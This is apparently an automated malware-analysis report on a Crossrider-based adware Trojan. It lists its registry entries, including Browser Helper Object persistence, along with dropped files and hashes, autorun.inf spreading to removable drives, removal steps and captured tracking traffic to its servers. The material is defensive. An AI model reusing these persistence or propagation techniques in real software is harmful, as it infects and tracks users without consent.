[HKCR\CrossriderApp0061915.Sandbox\CurVer]
"(Default)" = "CrossriderApp0061915.Sandbox"
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\InprocServer32]
"(Default)" = "%Program Files%\Sense\Sense-bho.dll"
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\InprocServer32]
"(Default)" = "%Program Files%\Sense\Sense-bho.dll"
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0061915"
[HKCR\CrossriderApp0061915.BHO.1]
"(Default)" = "CrossriderApp0061915"
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644194415}\1.0]
"(Default)" = "CrossriderApp0061915 Type Library"
[HKCR\Interface\{55555555-5555-5555-5555-550655195515}]
"(Default)" = "ICrossriderBHO"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644194415}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0061915.Sandbox"
[HKCR\CrossriderApp0061915.Sandbox.1]
"(Default)" = "CrossriderApp0061915.Sandbox"
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644194415}"
[HKCR\Interface\{55555555-5555-5555-5555-550655195515}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644194415}"
[HKCR\Interface\{55555555-5555-5555-5555-550655195515}\TypeLib]
"Version" = "1.0"
[HKCR\CrossriderApp0061915.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622192215}"
[HKCR\CrossriderApp0061915.BHO]
"(Default)" = "CrossriderApp0061915"
[HKCR\CrossriderApp0061915.BHO\CurVer]
"(Default)" = "CrossriderApp0061915"
[HKCR\CrossriderApp0061915.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622192215}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\ProgID]
"(Default)" = "CrossriderApp0061915.BHO.1"
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}]
"(Default)" = "Sense"
[HKCR\Interface\{66666666-6666-6666-6666-660666196615}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CrossriderApp0061915.Sandbox]
"(Default)" = "CrossriderApp0061915.Sandbox"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 3B 0C 9A BD EC 6C 81 F8 3D 71 2E D5 D3 9D 32"
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\Implemented Categories]
"(Default)" = ""
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\ProgID]
"(Default)" = "CrossriderApp0061915.Sandbox.1"
[HKCR\CrossriderApp0061915.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611191115}"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644194415}\1.0\0\win32]
"(Default)" = "%Program Files%\Sense\Sense-bho.dll"
[HKCR\Interface\{55555555-5555-5555-5555-550655195515}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644194415}"
[HKCR\Interface\{66666666-6666-6666-6666-660666196615}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}]
"(Default)" = "CrossriderApp0061915.Sandbox"
[HKCR\Interface\{66666666-6666-6666-6666-660666196615}\TypeLib]
"Version" = "1.0"
[HKCR\CrossriderApp0061915.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611191115}"
[HKCR\Interface\{66666666-6666-6666-6666-660666196615}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644194415}"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611191115}]
"NoExplorer" = "1"
"(Default)" = "CrossriderApp0061915"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\Programmable]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\InprocServer32]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\InprocServer32]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611191115}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\ProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\Implemented Categories]
Dropped PE files
MD5 | File path |
---|---|
5ea67e0c698c6aa0edc4c05f0ea7a968 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\0007F3B4_Rar\%original file name%.exe |
00a0194c20ee912257df53bfe258ee4a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\System.dll |
7d8a3f7a171be884783cab827f170855 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\Tkbjndnqomlxl.exe |
c4fd010850fca98b91b2b1f69adc5dbe | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\WrapperUtils.dll |
0f962c0a31b227e06eb817f1e97a46c5 | c:\ljssj.pif |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
GoogleUpdate.exe:2616
GoogleUpdate.exe:2788
GoogleUpdate.exe:2396
GoogleUpdate.exe:3060
GoogleUpdate.exe:2140
GoogleUpdate.exe:3724
GoogleUpdate.exe:2504
a4f7d362-83b9-4acf-812c-4634a66ba943-4.exe:2092
%original file name%.exe:312
a4f7d362-83b9-4acf-812c-4634a66ba943-11.exe:3964
Sense-codedownloader.exe:3400
Sense-codedownloader.exe:3032
a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe:2568
Tkbjndnqomlxl.exe:2840
regsvr32.exe:2328 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MSIa82cb.LOG (474 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (940 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (936 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (54 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar8.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (673 bytes)
%Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)
%WinDir%\system.ini (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\WrapperUtils.dll (1856 bytes)
C:\autorun.inf (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0007F3B4_Rar\%original file name%.exe (75544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\Tkbjndnqomlxl.exe (4202874 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\winkumnvb.exe (561 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (332415 bytes)
%System%\drivers\ktonn.sys (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wduc.exe (561 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (272 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\orxds.exe (15019 bytes)
C:\totalcmd\TOTALCMD.EXE (1728 bytes)
C:\ljssj.pif (99 bytes)
%Program Files%\Common Files\Adobe\ARM\1.0\AdobeARM.exe (12 bytes)
%Program Files%\Adobe\Reader 9.0\Reader\Reader_sl.exe (840 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\Smpcpq.tmp (308806 bytes)
%Program Files%\Sense\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\14.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\37.js (2 bytes)
%Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\update.json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\42.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\InstallerUtils2.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\psuser.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleUpdateBroker.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\45.js (1 bytes)
%Program Files%\Sense\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\191.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\123.js (1 bytes)
%Program Files%\Sense\1293297481.mxaddon (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\13.js (6 bytes)
%Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943.xpi (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\269.js (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\281.js (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\npGoogleUpdate4.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\93.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\91.js (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\207.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\UserInfo.dll (4 bytes)
%Program Files%\Sense\Sense-codedownloader.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\7809 (1064979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\psmachine.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\update[1].json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\263.js (1 bytes)
%Program Files%\Sense\Sense-bg.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleUpdateHelper.msi (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\239.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\64.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\goopdate.dll (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\192.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\223.js (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins.json (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\InstallerUtils.dll (27704 bytes)
%Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943-11.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\1.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\244.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%WinDir%\Tasks\temp_a4f7d362-83b9-4acf-812c-4634a66ba943-2.job (138 bytes)
%WinDir%\Tasks\a4f7d362-83b9-4acf-812c-4634a66ba943-1.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\125401 (279876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\38.js (2 bytes)
%Program Files%\Sense\042abe8f-d024-483d-b16f-b35d66d1d726.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\72.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\221.js (415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\102.js (1 bytes)
%WinDir%\Tasks\a4f7d362-83b9-4acf-812c-4634a66ba943-11.job (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\userCode\background.js (429 bytes)
%Program Files%\Sense\utils.exe (71614 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\220.js (784 bytes)
%WinDir%\Tasks\a4f7d362-83b9-4acf-812c-4634a66ba943-2.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\userCode\extension.js (613 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\246.js (7 bytes)
%Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\4.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\180.js (1 bytes)
%Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943-4.exe (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\226.js (510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\7.js (685 bytes)
%Program Files%\Sense\Sense-bho.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp (465960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\262.js (1 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 12.1.12.2
File Description: Isawirmknh
Comments:
Language: English (United States)
Company Name: Product Name: Product Version: Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: 12.1.12.2File Description: IsawirmknhComments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 34880 | 35328 | 4.14496 | 673c97bebf576db6879567a0bfd3908a |
.data | 40960 | 140 | 512 | 0.818128 | a5a710a52d844b19513b2cab5693dbc3 |
.rdata | 45056 | 9108 | 9216 | 4.0908 | 004265d16597098398ce8e06897dcd29 |
.bss | 57344 | 252880 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 311296 | 4868 | 5120 | 3.64756 | 20f692042b54593897a705a64d67ce50 |
.ndata | 319488 | 409600 | 8192 | 0 | 0829f71740aab1ab98b33eae21dee122 |
.rsrc | 729088 | 94208 | 91136 | 5.39469 | 1a1166481991566210d96a66548e9d17 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://cds.d5k9g9i8.hwcdn.net/installer_updates/000803/update.json | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_08_12&bic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&app=61915&appver=0&verifier=39aa73fdbfd54b44fad467ed5553801b&srcid=000803&upi=03a471124f01b8b4a21fa91e866e62ed&version_date=14-09-03&subid=0&zdata=0&xpiver=0_95&crxver=1_26_21&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=0&procstarttime=1411237378&procruntime=2&rnd=1411237380 | |
hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=3&ibic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&verifier=39aa73fdbfd54b44fad467ed5553801b&campaign=000803&app=61915&bhover=1_34_08_12&xpiver=0_95&crxver=1_26_21&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1411237378&asw=0_1073750528_0&browser=ie,de&rnd=1411237378 | |
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt | |
hxxp://e6845.ce.akamaiedge.net/ThawteTimestampingCA.crl | |
hxxp://e6845.ce.akamaiedge.net/tss-ca-g2.crl | |
hxxp://update.loadgenclientservice.com/installer_updates/000803/update.json | 69.16.175.42 |
hxxp://ts-crl.ws.symantec.com/tss-ca-g2.crl | 23.9.117.163 |
hxxp://logs.loadgenclientservice.com/monetization.gif?event=3&ibic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&verifier=39aa73fdbfd54b44fad467ed5553801b&campaign=000803&app=61915&bhover=1_34_08_12&xpiver=0_95&crxver=1_26_21&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1411237378&asw=0_1073750528_0&browser=ie,de&rnd=1411237378 | 69.16.175.10 |
hxxp://stats.loadgenclientservice.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_08_12&bic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&app=61915&appver=0&verifier=39aa73fdbfd54b44fad467ed5553801b&srcid=000803&upi=03a471124f01b8b4a21fa91e866e62ed&version_date=14-09-03&subid=0&zdata=0&xpiver=0_95&crxver=1_26_21&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=0&procstarttime=1411237378&procruntime=2&rnd=1411237380 | 176.32.100.244 |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt | 23.15.4.9 |
hxxp://crl.thawte.com/ThawteTimestampingCA.crl | 23.9.117.163 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /tss-ca-g2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: ts-crl.ws.symantec.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "9f824b3499ed210c19a35d1d0c0598f6:1411204296"
Last-Modified: Sat, 20 Sep 2014 09:11:36 GMT
Date: Sat, 20 Sep 2014 18:23:25 GMT
Content-Length: 477
Connection: keep-alive
Content-Type: application/pkix-crl
0...0.....0...*.H........0^1.0...U....US1.0...U....Symantec Corporation100...U...'Symantec Time Stamping Services CA - G2..140920090109Z..140930090109Z.00.0...U.#..0..._..n\..t...}.?..L...0...U.......P0...*.H..................5.....M....g..0..M..E}.0j`U..A.\ubg.k..s...s..Jo..:......j..]..B.....o......<N>7.D.GB..4.P..]*,...l..c..&^F.E..Xds..L..g...h.*..w2....7..NK=......8rRV6G.:.g....E.BT.....M.-h.U._.99H.l.....;.....W0...w..\epi..jYM.B....h.....ww...#..,....yK.3.r#C!..d...HTTP/1.1 200 OK..Server: Apache..ETag: "9f824b3499ed210c19a35d1d0c0598f6:1411204296"..Last-Modified: Sat, 20 Sep 2014 09:11:36 GMT..Date: Sat, 20 Sep 2014 18:23:25 GMT..Content-Length: 477..Connection: keep-alive..Content-Type: application/pkix-crl..0...0.....0...*.H........0^1.0...U....US1.0...U....Symantec Corporation100...U...'Symantec Time Stamping Services CA - G2..140920090109Z..140930090109Z.00.0...U.#..0..._..n\..t...}.?..L...0...U.......P0...*.H..................5.....M....g..0..M..E}.0j`U..A.\ubg.k..s...s..Jo..:......j..]..B.....o......<N>7.D.GB..4.P..]*,...l..c..&^F.E..Xds..L..g...h.*..w2....7..NK=......8rRV6G.:.g....E.BT.....M.-h.U._.99H.l.....;.....W0...w..\epi..jYM.B....h.....ww...#..,....yK.3.r#C!..d.....
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT
Accept-Ranges: bytes
ETag: "806f4cbb43dcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=9148
Date: Sat, 20 Sep 2014 18:23:24 GMT
Connection: keep-alive
X-CCC: US
X-CID: 2
1401CF3DB40B609892HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT..Accept-Ranges: bytes..ETag: "806f4cbb43dcf1:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Content-Length: 18..Cache-Control: max-age=9148..Date: Sat, 20 Sep 2014 18:23:24 GMT..Connection: keep-alive..X-CCC: US..X-CID: 2..1401CF3DB40B609892..
GET /monetization.gif?event=3&ibic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&verifier=39aa73fdbfd54b44fad467ed5553801b&campaign=000803&app=61915&bhover=1_34_08_12&xpiver=0_95&crxver=1_26_21&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1411237378&asw=0_1073750528_0&browser=ie,de&rnd=1411237378 HTTP/1.1
Host: logs.loadgenclientservice.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 20 Sep 2014 18:23:19 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1411237399.dop012.am4.t,1411237399.cds058.am4.c
